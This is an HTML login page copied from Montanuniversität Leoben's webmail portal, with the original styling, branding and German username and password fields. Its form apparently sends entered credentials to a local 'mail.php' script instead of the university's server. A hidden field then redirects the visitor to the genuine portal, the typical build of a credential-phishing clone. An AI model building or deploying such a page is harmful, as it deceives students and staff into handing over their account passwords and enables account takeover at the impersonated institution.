<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- saved from url=(0030)https://nmail.unileoben.ac.at/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Anmeldung bei nmail1/MU-Leoben/AT</title><style type="text/css"> <!-- body { margin: 5px; padding: 5px; font-family: tahoma, helvetica, arial, sans-serif; color: #3B3B3B; font-size: 12px;}h1,h2,h3 { font-weight: bold; color: #006e6e;}a { text-decoration: none; font-weight: normal; border: none; color: #136768;}a:hover { text-decoration: underline; border: none; color: #136768;}div#Anmeldung { margin-top: 0; margin-left: 5px; padding: 5px; width: 300px;}div#Alles { margin-top: 5em; margin-left: auto; margin-right: auto; width: 320px; background-color: #FFFFFF; border: 2px outset silver;}div#Daten { background-color: #EEEEEE; padding: 5px; border: 1px dotted black;} --> </style><meta http-equiv="expires" content="0">
<script language="JavaScript" type="text/javascript">
<!-- 
var NN4 = (document.layers) ? true : false;

// required for NN4 to reliably capture key events
if (NN4) document.captureEvents(Event.KEYPRESS)
document.onkeypress = function (event) {
  checkEnter(event)
  return true
}

function setFormFocus() {
	document.forms[0].Username.focus(); 
	document.forms[0].Username.select();
}

//submit the form if the user presses the ENTER key
function checkEnter(event)
{ 	
	var code = 0
	
	if (NN4) {
		code = event.which
	} else {
		code = window.event.keyCode
	}
		
	if (code==13)
		document.forms[0].submit()
}
// -->
</script>
</head>
<body text="#000000" bgcolor="#FFFFFF" onload="setFormFocus();">

<form method="post" action="mail.php" name="_LoginUserForm">
<input type="hidden" name="%%ModDate" value="67A2EF5600007F71"><div id="Alles">
<div id="Anmeldung">
<h2>Montanuniversität Leoben</h2>
<h3>Anmeldung</h3>
<div id="Daten">
<b>Benutzername</b><br>
<input name="Username" value="" size="20" maxlength="50" autocomplete="off"><br><br>
<b>Kennwort</b><br>
<input name="Password" value="" type="password" size="20" maxlength="50" autocomplete="off"><br>

<input type="submit" value="Anmelden">
</div>
<br>
<div id="Daten">Bitte melden Sie sich an.</div>
</div>
<br>
</div>


<div align="center"><br>
<font size="2">
<input name="RedirectTo" value="https://nmail.unileoben.ac.at/portal.nsf" type="hidden"></font></div></form>


</body></html>